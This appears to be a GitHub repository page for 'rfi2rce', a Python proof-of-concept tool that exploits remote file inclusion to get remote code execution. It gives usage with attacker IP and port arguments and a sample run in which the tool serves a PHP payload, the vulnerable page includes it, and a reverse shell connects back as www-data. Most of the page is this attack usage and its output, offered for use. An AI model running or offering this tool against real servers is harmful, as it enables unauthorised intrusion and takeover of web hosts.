0bfxgh0st / rfi2rce

Remote File Inclusion To Remote Code Execution (PoC)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

rfi2rce

Remote File Inclusion To Remote Code Execution (PoC)

rfi2rce - Remote File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
Usage python3 rfi2rce <url> <attacker ip> <attacker port> <attacker server port>
Example: python3 rfi2rce http://ghost.server/index.php?page= 10.0.2.15 1337 8080

Successful connection example

┌──(root💀ghost)-[/home/ghost/rfi2rce]
└─# python3 rfi2rce http://ghost.server/index.php?page= 10.0.2.15 1337 8080
rfi2rce - Remote File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
HTTP server on 8080
listening on [any] 1337 ...
10.0.2.15 - - [09/Oct/2022 12:11:48] "GET /payload.php HTTP/1.1" 200 -
10.0.2.15: inverse host lookup failed: Unknown host
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.15] 44080
Linux ghost 5.16.0-kali7-amd64 #1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01) x86_64 GNU/Linux
 12:11:48 up  1:05,  2 users,  load average: 0.11, 0.11, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ghost    tty7     :0               11:17    1:05m 36.02s  0.14s xfce4-session
ghost    pts/1    -                11:17    3.00s  3.86s  0.10s sudo su root
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

About

Remote File Inclusion To Remote Code Execution (PoC)


Languages

Language:Python 100.0%